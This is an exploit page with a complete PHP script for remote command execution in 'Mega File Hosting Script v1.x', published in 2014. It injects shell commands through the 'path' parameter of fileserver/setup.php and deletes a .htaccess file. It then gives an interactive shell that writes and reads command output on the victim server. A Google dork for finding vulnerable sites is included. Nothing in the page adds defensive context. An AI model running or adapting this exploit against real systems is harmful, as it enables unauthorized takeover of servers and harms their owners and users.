facebook facebook twitter rss

Mega File Hosting Script v1.x Remote Command Execution

Author: DzKabyle , Published: 27-02-2014
<?
/*
-------------------------------------------------------------------
Mega File Hosting Script v1.x Remote Command Execution
-------------------------------------------------------------------

########################################################################
# Author = DzKabyle #
# E-mail = k4byl3@gmail.com #
# Google Dork = intext:" Powered by: MFH v1.x | CSS | XHTML " #
# Vendor : https://yabsoft.com/ #
# Tested on : Windows 7 #
# Thx TO : UzunDz & jasass #
########################################################################

*/


error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

print "\n+--------------------------------------------------------------------+";
print "\n| Mega File Hosting Script v1.x Remote Command Execution By DzKabyle |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path/ \n";
print "\nExample....: php $argv[0] http://localhost/ mfh/ \n";
die();
}

$host = $argv[1];
$path = $argv[2];

$path1 = file_get_contents($host."/".$path."/serverroot.php");
$payload=$host."/". $path."/fileserver/setup.php?act=checkmodule&path=+rm+".$path1."/backup/.htaccess+;+&path2=&path3=&check=ReCheck";
rce($payload);
$payload2=$host."/".$path."/fileserver/setup.php?act=checkmodule&path=+id+>+".$path1."/backup/dz.txt+;+&path2=&path3=&check=ReCheck";
rce($payload2);
echo file_get_contents($host."/".$path."/backup/dz.txt");
while(1)
{
print "\nMFH-Shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;

$cmd = str_ireplace(' ','+',$cmd);
$payload2=$host."/".$path."/fileserver/setup.php?act=checkmodule&path=+".$cmd."+>+".$path1."/backup/dz.txt+;+&path2=&path3=&check=ReCheck";
rce($payload2);
echo file_get_contents($host."/".$path."/backup/dz.txt");

}

function rce($url){

$dzkabyle = curl_init();
curl_setopt($dzkabyle, CURLOPT_URL,$url);
curl_setopt($dzkabyle,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
curl_setopt($dzkabyle, CURLOPT_POST, 0);
curl_setopt($dzkabyle, CURLOPT_POSTFIELDS,$post);
curl_setopt($dzkabyle,CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($dzkabyle);


}

//Exploited By dzkabyle www.exploit4arab.net sec4ever
?>

Like us on Facebook :